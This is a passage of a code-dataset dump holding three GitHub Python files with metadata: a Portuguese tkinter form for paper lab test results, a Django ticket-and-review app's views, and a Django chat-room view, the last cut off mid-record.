pady=ypadding)\n\n\t\tlabelOpacidadeFeltro.grid(row=16, column=0, sticky=W, padx=xpadding, pady=ypadding)\n\t\tentryOpacidadeFeltro.grid(row=16, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\n\t\tlabelFluorescenciaFeltro.grid(row=17, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryFluorescenciaFeltro.grid(row=17, column=1, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\t\n\t\tlabelAlvuraD65TelaFeltro.grid(row=18, column=0, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\t\tentryAlvuraD65TelaFeltro.grid(row=18, column=1, sticky=W, padx=xpadding, pady=ypadding)\t\t\n\n\t\tbuttonsRow = 19\n\n\telse:\t\n\t\tfor index in range(numberOfTestingPoints):\n\t\t\tif index+1 > 10:\n\t\t\t\tlabelColumn = 2\n\t\t\t\tentryColumn = 3\n\t\t\t\t\n\t\t\t\tbuttonsColumnSpan = 2\n\t\t\t\tsaveButtonColumn = 2\n\n\t\t\tif index+1 > 20:\n\t\t\t\tlabelColumn = 4\n\t\t\t\tentryColumn = 5\t\n\n\t\t\t\tbuttonsColumnSpan = 3\n\t\t\t\tsaveButtonColumn = 3\n\n\t\t\tif labelEntryRow >= 10:\n\t\t\t\tlabelEntryRow = 0\n\n\t\t\tlabelEntryRow += 1\t\n\n\t\t\tbuttonsRow += 5\n\n\t\t\tif index+1 >= 10:\n\t\t\t\tbuttonsRow = 13\t\t\n\t\t\t\n\t\t\tlabel = Label(secondWindow, text=\"P\"+str(index+1)+\":\")\n\t\t\ttestingPointsLabelList[index] = label\n\t\t\ttestingPointsLabelList[index].grid(row=labelEntryRow+2, column=labelColumn, sticky=W, padx=xpadding, pady=ypadding)\n\n\t\t\tentry = Entry(secondWindow)\n\t\t\ttestingPointsEntryList[index] 
= entry\n\t\t\ttestingPointsEntryList[index].grid(row=labelEntryRow+2, column=entryColumn, sticky=W, padx=xpadding, pady=ypadding)\n\n\t\tif labelColumn == 0:\n\t\t\tlabelColumn += 1\n\t\t\tentryColumn += 1\n\n\tbackButton.grid(row=buttonsRow, column=backButtonColumn, columnspan=buttonsColumnSpan, padx=xpadding, pady=15)\t\n\t\n\tsaveResultsButton.grid(row=buttonsRow, column=saveButtonColumn, columnspan=buttonsColumnSpan, padx=xpadding, pady=15)\n\t\t\t\ndef getFoProperties(event):\n\tglobal foNumber\n\tglobal arriveDate\n\tglobal arriveHour\n\tglobal deliveringDate\n\tglobal deliveringHour\n\tglobal defect\n\tglobal testType\n\tglobal foTest\n\tglobal numberOfTestingPoints\n\tglobal register\n\tglobal comment\n\tglobal idString\n\t\n\tindex = foNumberBox.current()\n\n\tif index != -1:\n\t\tfoNumber = foNumberValues[index]\n\t\tarriveDate = arriveDateValues[index]\n\t\tarriveHour = arriveHourValues[index]\n\t\tdeliveringDate = deliveringDateValues[index]\n\t\tdeliveringHour = deliveringHourValues[index]\n\t\tdefect = defectValues[index]\n\t\ttestType = testTypeValues[index]\n\t\tfoTest = valuesList[index]\n\t\tnumberOfTestingPoints = numberOfTestingPointsValues[index]\n\t\tregister = registerValues[index]\n\t\tcomment = commentValues[index]\n\n\t\tidString = idValues[index]\n\n\t\tarriveDateLabel1[\"text\"] = str(arriveDate)\n\t\tarriveHourLabel1[\"text\"] = str(arriveHour)\n\t\t\n\t\tif str(deliveringDate) == \"None\":\n\t\t\tdeliveringDateLabel1[\"text\"] = \"\"\n\t\telse:\t\t\n\t\t\tdeliveringDateLabel1[\"text\"] = str(deliveringDate)\n\t\t\n\t\tif str(deliveringHour) == \"None\":\n\t\t\tdeliveringHourLabel1[\"text\"] = \"\"\t\n\t\telse:\t\n\t\t\tdeliveringHourLabel1[\"text\"] = str(deliveringHour)\n\t\t\n\t\tdefectLabel1[\"text\"] = str(defect)\n\t\ttestTypeLabel1[\"text\"] = testType\n\t\tnumberOfTestingPointsLabel1[\"text\"] = str(numberOfTestingPoints)\n\t\tcommentLabel1[\"text\"] = comment\n\n\t\tanalyseButton[\"state\"] = NORMAL\n\n\telse:\n\t\t# print(\"Invalid Item on the Combobox\")\n\t\tmessagebox.showerror(\"Erro\", \"FO não existente.\")\n\n# Create all the widgets\nmaster_frame = Frame(root)\nmaster_frame.pack()\n\nxpadding = 5\nypadding = 3\n\nintroLabel = Label(master_frame, text=\"Selecione a FO para Análise.\")\nintroLabel.grid(row=0, column=0, columnspan=2, padx=xpadding, pady=15)\n\nfoNumberBoxLabel = Label(master_frame, text=\"Numero da FO:\")\nfoNumberBoxLabel.grid(row=1, column=0, sticky=W, padx=xpadding, pady=ypadding)\n\nfoNumberBox = ttk.Combobox(master_frame, postcommand=updateCombobox, width=25)\nfoNumberBox.bind(\"<<ComboboxSelected>>\", getFoProperties)\nfoNumberBox.grid(row=1, column=1, padx=xpadding, pady=ypadding)\n\narriveDateLabel = Label(master_frame, text=\"Data de Chegada:\")\narriveDateLabel.grid(row=2, column=0, sticky=W, padx=xpadding, pady=ypadding)\narriveDateLabel1 = Label(master_frame)\narriveDateLabel1.grid(row=2, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\narriveHourLabel = Label(master_frame, text=\"Hora de Chegada:\")\narriveHourLabel.grid(row=3, column=0, sticky=W, padx=xpadding, pady=ypadding)\narriveHourLabel1 = Label(master_frame)\narriveHourLabel1.grid(row=3, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\ndeliveringDateLabel = Label(master_frame, text=\"Data de Entrega:\")\ndeliveringDateLabel.grid(row=4, column=0, sticky=W, padx=xpadding, pady=ypadding)\ndeliveringDateLabel1 = Label(master_frame)\ndeliveringDateLabel1.grid(row=4, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\ndeliveringHourLabel = Label(master_frame, text=\"Hora 
da Entrega:\")\ndeliveringHourLabel.grid(row=5, column=0, sticky=W, padx=xpadding, pady=ypadding)\ndeliveringHourLabel1 = Label(master_frame)\ndeliveringHourLabel1.grid(row=5, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\ndefectLabel = Label(master_frame, text=\"Defeito:\")\ndefectLabel.grid(row=6, column=0, sticky=W, padx=xpadding, pady=ypadding)\ndefectLabel1 = Label(master_frame)\ndefectLabel1.grid(row=6, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\ntestTypeLabel = Label(master_frame, text=\"Tipo de Teste:\")\ntestTypeLabel.grid(row=7, column=0, sticky=W, padx=xpadding, pady=ypadding)\ntestTypeLabel1 = Label(master_frame)\ntestTypeLabel1.grid(row=7, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\nnumberOfTestingPointsLabel = Label(master_frame, text=\"Pontos de Analise:\")\nnumberOfTestingPointsLabel.grid(row=8, column=0, sticky=W, padx=xpadding, pady=ypadding)\nnumberOfTestingPointsLabel1 = Label(master_frame)\nnumberOfTestingPointsLabel1.grid(row=8, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\ncommentLabel = Label(master_frame, text=\"Observação:\")\ncommentLabel.grid(row=9, column=0, sticky=NW, padx=xpadding, pady=ypadding)\ncommentLabel1 = Label(master_frame, anchor=W, wraplength=130, justify=LEFT)\ncommentLabel1.grid(row=9, column=1, sticky=W, padx=xpadding, pady=ypadding)\n\nanalyseButton = Button(master_frame, text=\"Analisar\", command=createTestResultEntriesWindow, state=DISABLED, width=10)\nanalyseButton.grid(row=10, column=0, columnspan=2, padx=xpadding, pady=15)\n\n# ///////////////////////////////////////////////////////////////////////////////////////////////////////\nsecondWindow = Frame(root)\t\n\ntestLabel = Label(secondWindow)\n\t\nanalistNameEntry = Entry(secondWindow)\n\nentryLuminTela = Entry(secondWindow)\nentryCoordATela = Entry(secondWindow)\nentryCoordBTela = Entry(secondWindow)\nentryAlvuraISOTela = Entry(secondWindow)\nentryBrancuraTela = Entry(secondWindow)\nentryOpacidadeTela = Entry(secondWindow)\nentryFluorescenciaTela = Entry(secondWindow)\nentryAlvuraD65Tela = Entry(secondWindow)\n\nlabelLuminTela = Label(secondWindow, text=\"Lumin. L - TELA:\")\nlabelCoordATela = Label(secondWindow, text=\"Coord. A - TELA:\")\nlabelCoordBTela = Label(secondWindow, text=\"Coord. B - TELA:\")\nlabelAlvuraISOTela = Label(secondWindow, text=\"Alvura ISO - TELA:\")\nlabelBrancuraTela = Label(secondWindow, text=\"Brancura - TELA:\")\nlabelOpacidadeTela = Label(secondWindow, text=\"Opacidade - TELA:\")\nlabelFluorescenciaTela = Label(secondWindow, text=\"Fluorescência - TELA:\")\nlabelAlvuraD65Tela = Label(secondWindow, text=\"Alvura D65 - TELA:\")\n\nentryLuminFeltro = Entry(secondWindow)\nentryCoordAFeltro = Entry(secondWindow)\nentryCoordBFeltro = Entry(secondWindow)\nentryAlvuraISOFeltro = Entry(secondWindow)\nentryBrancuraFeltro = Entry(secondWindow)\nentryOpacidadeFeltro = Entry(secondWindow)\nentryFluorescenciaFeltro = Entry(secondWindow)\nentryAlvuraD65TelaFeltro = Entry(secondWindow)\n\nlabelLuminFeltro = Label(secondWindow, text=\"Lumin. L - FELTRO:\")\nlabelCoordAFeltro = Label(secondWindow, text=\"Coord. A - FELTRO:\")\nlabelCoordBFeltro = Label(secondWindow, text=\"Coord. 
B - FELTRO:\")\nlabelAlvuraISOFeltro = Label(secondWindow, text=\"Alvura ISO - FELTRO:\")\nlabelBrancuraFeltro = Label(secondWindow, text=\"Brancura - FELTRO:\")\nlabelOpacidadeFeltro = Label(secondWindow, text=\"Opacidade - FELTRO:\")\nlabelFluorescenciaFeltro = Label(secondWindow, text=\"Fluorescência - FELTRO:\")\nlabelAlvuraD65TelaFeltro = Label(secondWindow, text=\"Alvura D65 - FELTRO:\")\n\t\nsaveResultsButton = Button(secondWindow, text=\"Salvar\", command=saveTestResults, width=10)\nbackButton = Button(secondWindow, text=\"Voltar\", command=goBack, width=10)\n\nroot.mainloop()\n\n# import os\n# os.chdir(\"C:/Users/\")\n# os.getcwd()\n# 'C:\\\\Users'\n\n# list.remove(x), Remove the first item from the list whose value is x. It is an error if there is no such item.\n", "repo_name": "Thiago-Nascimento/AppFOs", "sub_path": "teste/analisaFO.py", "file_name": "analisaFO.py", "file_ext": "py", "file_size_in_byte": 26727, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.chdir", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 192, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 192, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 193, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 193, "usage_type": "attribute"}, {"api_name": "getpass.getuser", "line_number": 201, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 215, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 215, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 248, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 248, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 252, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 252, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 255, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 255, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 291, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 291, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 292, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 292, "usage_type": "attribute"}, {"api_name": "getpass.getuser", "line_number": 300, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 312, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 312, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 341, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 341, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 344, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 344, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 346, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 346, "usage_type": "name"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 737, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 737, "usage_type": "name"}, {"api_name": "tkinter.ttk.Combobox", "line_number": 752, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 752, 
"usage_type": "name"}]} +{"seq_id": "19310429825", "text": "from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\n\nfrom itertools import chain\n\nfrom authentification.models import User\nfrom review.models import Ticket, Review, UserFollows\nfrom review.forms import TicketForm, ReviewForm, TicketReviewForm\n\n\ndef get_followed_user(user):\n followed_users = []\n for link in UserFollows.objects.filter(user=user):\n followed_users.append(link.followed_user)\n return followed_users\n\n\ndef get_followers(user):\n followers = []\n for link in UserFollows.objects.filter(followed_user=user):\n followers.append(link.user)\n return followers\n\n\ndef get_users_viewable_tickets(user):\n tickets = []\n followed_users = get_followed_user(user)\n followed_users.append(user)\n for followed_user in followed_users:\n tickets.extend(Ticket.objects.filter(user=followed_user))\n return tickets\n\n\ndef get_users_viewable_reviews(user):\n reviews = []\n followed_users = get_followed_user(user)\n followed_users.append(user)\n my_tickets = Ticket.objects.filter(user=user)\n for ticket in my_tickets:\n relative_reviews = Review.objects.filter(ticket=ticket)\n for review in relative_reviews:\n if review.user not in followed_users:\n reviews.append(review)\n for followed_user in followed_users:\n reviews.extend(Review.objects.filter(user=followed_user))\n return reviews\n\n\ndef annotate_post(posts):\n response = []\n for post in posts:\n if isinstance(post, Ticket):\n obj = {'content': post, 'type': 'TICKET'}\n elif isinstance(post, Review):\n obj = {'content': post, 'type': 'REVIEW'}\n response.append(obj)\n return response\n\n\n@login_required(login_url='home')\ndef flux(request):\n tickets = get_users_viewable_tickets(request.user)\n reviews = get_users_viewable_reviews(request.user)\n for ticket in tickets:\n if Review.objects.filter(ticket=ticket):\n ticket.answered = True\n posts = sorted(chain(tickets, reviews),\n key=lambda post: post.time_created,\n reverse=True)\n context = {'posts': annotate_post(posts)}\n return render(request, 'review/flux.html', context)\n\n\n@login_required(login_url='home')\ndef create_ticket(request, id_ticket=None):\n if id_ticket is not None:\n ticket = get_object_or_404(Ticket, pk=id_ticket)\n else:\n ticket = Ticket(user=request.user)\n if request.method == 'GET':\n form = TicketForm(instance=ticket)\n return render(request, 'review/addticket.html', {'form': form})\n elif request.method == 'POST':\n form = TicketForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('flux')\n else:\n return render(request, 'review/addticket.html', {'form': form})\n\n\n@login_required(login_url='home')\ndef modify_ticket(request, id_ticket):\n context = {}\n ticket = get_object_or_404(Ticket, pk=id_ticket)\n if request.method == 'GET':\n if ticket is None:\n pass\n else:\n form = TicketForm(instance=ticket)\n context['form'] = form\n return render(request, 'review/addticket.html', context)\n elif request.method == 'POST':\n form = TicketForm(request.POST, request.FILES, instance=ticket)\n if form.is_valid():\n form.save()\n return redirect('posts')\n\n\n@login_required(login_url='home')\ndef delete_ticket(request, id_ticket):\n ticket = get_object_or_404(Ticket, pk=id_ticket)\n ticket.delete()\n return redirect('posts')\n\n\n@login_required(login_url='home')\ndef create_review(request, id_ticket=None):\n review = None\n context = {}\n if id_ticket is not None:\n ticket = 
get_object_or_404(Ticket, pk=id_ticket)\n        context = {'post': {'content': ticket}}\n        review = Review(ticket=ticket,\n                        rating=None,\n                        headline=None,\n                        body=None,\n                        user=request.user,\n                        time_created=None)\n    else:\n        review = Review(ticket=None,\n                        rating=None,\n                        headline=None,\n                        body=None,\n                        user=request.user,\n                        time_created=None)\n    if request.method == 'GET':\n        form = ReviewForm(instance=review)\n        context['form'] = form\n        return render(request, 'review/addreview.html', context)\n    elif request.method == 'POST':\n        form = ReviewForm(request.POST)\n        if form.is_valid():\n            # form.save() persists the review; the extra ticket.save() crashed when no ticket was given\n            form.save()\n            return redirect('flux')\n        else:\n            return render(request, 'review/addreview.html', context)\n\n\n@login_required(login_url='home')\ndef modify_review(request, id_review):\n    context = {}\n    review = get_object_or_404(Review, pk=id_review)\n    if request.method == 'GET':\n        if review is None:\n            pass\n        else:\n            form = ReviewForm(instance=review)\n            context = {'post': {'content': review.ticket}, 'form': form}\n        return render(request, 'review/addreview.html', context)\n    elif request.method == 'POST':\n        form = ReviewForm(request.POST, instance=review)\n        if form.is_valid():\n            form.save()\n            return redirect('posts')\n\n\n@login_required(login_url='home')\ndef delete_review(request, id_review):\n    review = get_object_or_404(Review, pk=id_review)\n    review.ticket.answered = False\n    review.delete()\n    return redirect('posts')\n\n\n@login_required(login_url='home')\ndef create_ticketreview(request):\n    if request.method == 'GET':\n        form = TicketReviewForm()\n        return render(request, 'review/addticketreview.html', {'form': form})\n    elif request.method == 'POST':\n        data = request.POST\n        ticket_form = TicketForm({'title': data['ticket_title'],\n                                  'user': request.user,\n                                  'description': data['ticket_description'],\n                                  'image': data['ticket_image']})\n        if ticket_form.is_valid():\n            ticket = ticket_form.save()\n            review_form = ReviewForm({'ticket': ticket,\n                                      'rating': data['review_rating'],\n                                      'headline': data['review_headline'],\n                                      'body': data['review_body'],\n                                      'user': request.user})\n            if review_form.is_valid():\n                review_form.save()\n        return redirect('flux')\n\n\n@login_required(login_url='home')\ndef follow(request):\n    context = {}\n    if request.method == 'GET':\n        followed_users = get_followed_user(request.user)\n        followers = get_followers(request.user)\n        context = {'followed_users': followed_users, 'followers': followers}\n        return render(request, 'review/follow.html', context)\n    elif request.method == 'POST':\n        new_followed_user = User.objects.filter(username=request.POST['new_followed_user'])[0]\n        if new_followed_user:\n            UserFollows.objects.create(user=request.user, followed_user=new_followed_user)\n        return redirect('follow')\n\n\n@login_required(login_url='home')\ndef delete_follow(request, id_followed_user):\n    followed_user = get_object_or_404(User, pk=id_followed_user)\n    link = get_object_or_404(UserFollows, user=request.user, followed_user=followed_user)\n    link.delete()\n    return redirect('follow')\n\n\n@login_required(login_url='home')\ndef posts(request):\n    tickets = Ticket.objects.filter(user=request.user)\n    reviews = Review.objects.filter(user=request.user)\n    for ticket in tickets:\n        if Review.objects.filter(ticket=ticket):\n            ticket.answered = True\n    posts = sorted(chain(tickets, reviews),\n                   key=lambda post: post.time_created,\n                   reverse=True)\n    context = {'posts': annotate_post(posts)}\n    return render(request, 'review/posts.html', context)\n", "repo_name": "S0Imyr/Projet-9", "sub_path": "Projet9/review/views.py", "file_name": 
"views.py", "file_ext": "py", "file_size_in_byte": 8140, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "review.models.UserFollows.objects.filter", "line_number": 13, "usage_type": "call"}, {"api_name": "review.models.UserFollows.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "review.models.UserFollows", "line_number": 13, "usage_type": "name"}, {"api_name": "review.models.UserFollows.objects.filter", "line_number": 20, "usage_type": "call"}, {"api_name": "review.models.UserFollows.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "review.models.UserFollows", "line_number": 20, "usage_type": "name"}, {"api_name": "review.models.Ticket.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "review.models.Ticket.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "review.models.Ticket", "line_number": 30, "usage_type": "name"}, {"api_name": "review.models.Ticket.objects.filter", "line_number": 38, "usage_type": "call"}, {"api_name": "review.models.Ticket.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "review.models.Ticket", "line_number": 38, "usage_type": "name"}, {"api_name": "review.models.Review.objects.filter", "line_number": 40, "usage_type": "call"}, {"api_name": "review.models.Review.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "review.models.Review", "line_number": 40, "usage_type": "name"}, {"api_name": "review.models", "line_number": 41, "usage_type": "name"}, {"api_name": "review.models.user", "line_number": 42, "usage_type": "attribute"}, {"api_name": "review.models", "line_number": 42, "usage_type": "name"}, {"api_name": "review.models", "line_number": 43, "usage_type": "argument"}, {"api_name": "review.models.Review.objects.filter", "line_number": 45, "usage_type": "call"}, {"api_name": "review.models.Review.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "review.models.Review", "line_number": 45, "usage_type": "name"}, {"api_name": "review.models.Ticket", "line_number": 52, "usage_type": "argument"}, {"api_name": "review.models.Review", "line_number": 54, "usage_type": "argument"}, {"api_name": "review.models.Review.objects.filter", "line_number": 65, "usage_type": "call"}, {"api_name": "review.models.Review.objects", "line_number": 65, "usage_type": "attribute"}, {"api_name": "review.models.Review", "line_number": 65, "usage_type": "name"}, {"api_name": "itertools.chain", "line_number": 67, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 71, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 60, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 77, "usage_type": "call"}, {"api_name": "review.models.Ticket", "line_number": 77, "usage_type": "argument"}, {"api_name": "review.models.Ticket", "line_number": 79, "usage_type": "call"}, {"api_name": "review.forms.TicketForm", "line_number": 81, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 82, "usage_type": "call"}, {"api_name": "review.forms.TicketForm", "line_number": 84, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 87, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 89, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 74, "usage_type": 
"call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 95, "usage_type": "call"}, {"api_name": "review.models.Ticket", "line_number": 95, "usage_type": "argument"}, {"api_name": "review.forms.TicketForm", "line_number": 100, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 102, "usage_type": "call"}, {"api_name": "review.forms.TicketForm", "line_number": 104, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 107, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 92, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 112, "usage_type": "call"}, {"api_name": "review.models.Ticket", "line_number": 112, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 114, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 110, "usage_type": "call"}, {"api_name": "review.models", "line_number": 119, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 122, "usage_type": "call"}, {"api_name": "review.models.Ticket", "line_number": 122, "usage_type": "argument"}, {"api_name": "review.models", "line_number": 124, "usage_type": "name"}, {"api_name": "review.models.Review", "line_number": 124, "usage_type": "call"}, {"api_name": "review.models", "line_number": 131, "usage_type": "name"}, {"api_name": "review.models.Review", "line_number": 131, "usage_type": "call"}, {"api_name": "review.forms.ReviewForm", "line_number": 138, "usage_type": "call"}, {"api_name": "review.models", "line_number": 138, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 140, "usage_type": "call"}, {"api_name": "review.forms.ReviewForm", "line_number": 142, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 146, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 148, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 117, "usage_type": "call"}, {"api_name": "review.models", "line_number": 154, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 154, "usage_type": "call"}, {"api_name": "review.models.Review", "line_number": 154, "usage_type": "argument"}, {"api_name": "review.models", "line_number": 156, "usage_type": "name"}, {"api_name": "review.forms.ReviewForm", "line_number": 159, "usage_type": "call"}, {"api_name": "review.models", "line_number": 159, "usage_type": "name"}, {"api_name": "review.models.ticket", "line_number": 160, "usage_type": "attribute"}, {"api_name": "review.models", "line_number": 160, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 161, "usage_type": "call"}, {"api_name": "review.forms.ReviewForm", "line_number": 163, "usage_type": "call"}, {"api_name": "review.models", "line_number": 163, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 166, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 151, "usage_type": "call"}, {"api_name": "review.models", "line_number": 171, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 171, "usage_type": "call"}, {"api_name": "review.models.Review", "line_number": 171, "usage_type": "argument"}, {"api_name": "review.models.ticket", "line_number": 172, "usage_type": "attribute"}, 
{"api_name": "review.models", "line_number": 172, "usage_type": "name"}, {"api_name": "review.models.delete", "line_number": 173, "usage_type": "call"}, {"api_name": "review.models", "line_number": 173, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 174, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 169, "usage_type": "call"}, {"api_name": "review.forms.TicketReviewForm", "line_number": 180, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 181, "usage_type": "call"}, {"api_name": "review.forms.TicketForm", "line_number": 184, "usage_type": "call"}, {"api_name": "review.forms.ReviewForm", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 197, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 177, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 207, "usage_type": "call"}, {"api_name": "authentification.models.User.objects.filter", "line_number": 209, "usage_type": "call"}, {"api_name": "authentification.models.User.objects", "line_number": 209, "usage_type": "attribute"}, {"api_name": "authentification.models.User", "line_number": 209, "usage_type": "name"}, {"api_name": "review.models.UserFollows.objects.create", "line_number": 211, "usage_type": "call"}, {"api_name": "review.models.UserFollows.objects", "line_number": 211, "usage_type": "attribute"}, {"api_name": "review.models.UserFollows", "line_number": 211, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 212, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 200, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 217, "usage_type": "call"}, {"api_name": "authentification.models.User", "line_number": 217, "usage_type": "argument"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 218, "usage_type": "call"}, {"api_name": "review.models.UserFollows", "line_number": 218, "usage_type": "argument"}, {"api_name": "django.shortcuts.redirect", "line_number": 220, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 215, "usage_type": "call"}, {"api_name": "review.models.Ticket.objects.filter", "line_number": 225, "usage_type": "call"}, {"api_name": "review.models.Ticket.objects", "line_number": 225, "usage_type": "attribute"}, {"api_name": "review.models.Ticket", "line_number": 225, "usage_type": "name"}, {"api_name": "review.models.Review.objects.filter", "line_number": 226, "usage_type": "call"}, {"api_name": "review.models.Review.objects", "line_number": 226, "usage_type": "attribute"}, {"api_name": "review.models.Review", "line_number": 226, "usage_type": "name"}, {"api_name": "review.models.Review.objects.filter", "line_number": 228, "usage_type": "call"}, {"api_name": "review.models.Review.objects", "line_number": 228, "usage_type": "attribute"}, {"api_name": "review.models.Review", "line_number": 228, "usage_type": "name"}, {"api_name": "itertools.chain", "line_number": 230, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 234, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 223, "usage_type": "call"}]} +{"seq_id": "36603939655", "text": "from django.shortcuts import render\nfrom app.models import Room\n\nfrom re import match\n\n\ndef 
index_view(request):\n    return render(request, 'index.html', {\n        'rooms': Room.objects.all(),\n    })\n\n\ndef room_view(request, room_name):\n    # if room name valid\n    if match(\"^[A-Za-z0-9_]*$\", room_name):\n        chat_room, created = Room.objects.get_or_create(name=room_name)\n        # allow joining only while the room holds two people or fewer\n        if chat_room.get_online_count() <= 2:\n            return render(request, 'room.html', {\n                'room': chat_room,\n            })\n        else:\n            return render(request, 'index.html', {\n                'rooms': Room.objects.all(),\n                'error': 'Unable to join: This room is full!',\n            })\n    # otherwise return the home page with an error\n    else:\n        return render(request, 'index.html', {\n            'rooms': Room.objects.all(),\n            'error': 'Unable to create room: Invalid name!',\n        })", "repo_name": "timo-w/dissertation", "sub_path": "app/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 990, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.shortcuts.render", "line_number": 8, "usage_type": "call"}, {"api_name": "app.models.Room.objects.all", "line_number": 9, "usage_type": "call"}, {"api_name": "app.models.Room.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "app.models.Room", "line_number": 9, "usage_type": "name"}, {"api_name": "re.match", "line_number": 15, "usage_type": "call"}, {"api_name": "app.models.Room.objects.get_or_create", "line_number": 16, "usage_type": "call"}, {"api_name": "app.models.Room.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "app.models.Room", "line_number": 16, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 23, "usage_type": "call"}, {"api_name": "app.models.Room.objects.all", "line_number": 24, "usage_type": "call"}, {"api_name": "app.models.Room.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "app.models.Room", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 29, "usage_type": "call"}, {"api_name": "app.models.Room.objects.all", "line_number": 30, "usage_type": "call"}, {"api_name": "app.models.Room.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": 